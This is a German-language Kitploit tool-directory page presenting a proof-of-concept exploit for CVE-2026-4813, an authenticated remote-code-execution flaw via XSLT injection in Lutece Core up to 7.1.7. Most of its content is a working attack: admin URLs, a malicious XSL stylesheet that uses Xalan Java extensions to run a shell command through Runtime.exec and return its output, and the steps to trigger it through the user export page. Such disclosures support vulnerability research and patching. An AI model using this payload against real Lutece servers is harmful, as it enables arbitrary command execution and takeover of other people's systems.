Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-4813 — Proof-of-Concept-Exploit für authentifizierte Remote-Codeausführung über XSLT-Injection in Lutece Core, das die Befehlsausführung durch manipulierte XSL-Stylesheets demonstriert. | Kitploit
Tools/GitHubGitHub/trachinus/cve-2026-4813
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

Proof-of-Concept-Exploit für authentifizierte Remote-Codeausführung über XSLT-Injection in Lutece Core, das die Befehlsausführung durch manipulierte XSL-Stylesheets demonstriert.

Repository anzeigen
vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4813 (CVSS-B 9.4 KRITISCH)

Authentifizierte RCE durch XSLT-Injektion in Lutece Core <= 7.1.7

Erklärungen und mehr auf meiner Website <

PoC

Du benötigst ein Konto mit Administratorrechten.

  1. Navigiere im Admin-Panel zur Verwaltungsseite für den XSL-Export: /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. Klicke auf „Neues Transformationsblatt hinzufügen“.

  3. Lade eine .xsl-Datei mit dem Payload (einfacher id-Befehl) hoch:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. Speichere das neue XSL-Blatt.

  2. Navigiere zur Export-Benutzerseite: /jsp/admin/user/ExportUsers.jsp

  3. Wähle das soeben erstellte Transformationsblatt aus und bestätige.

  4. Das Ergebnis des id-Befehls sollte in der exportierten Datei enthalten sein.

Tool herunterladen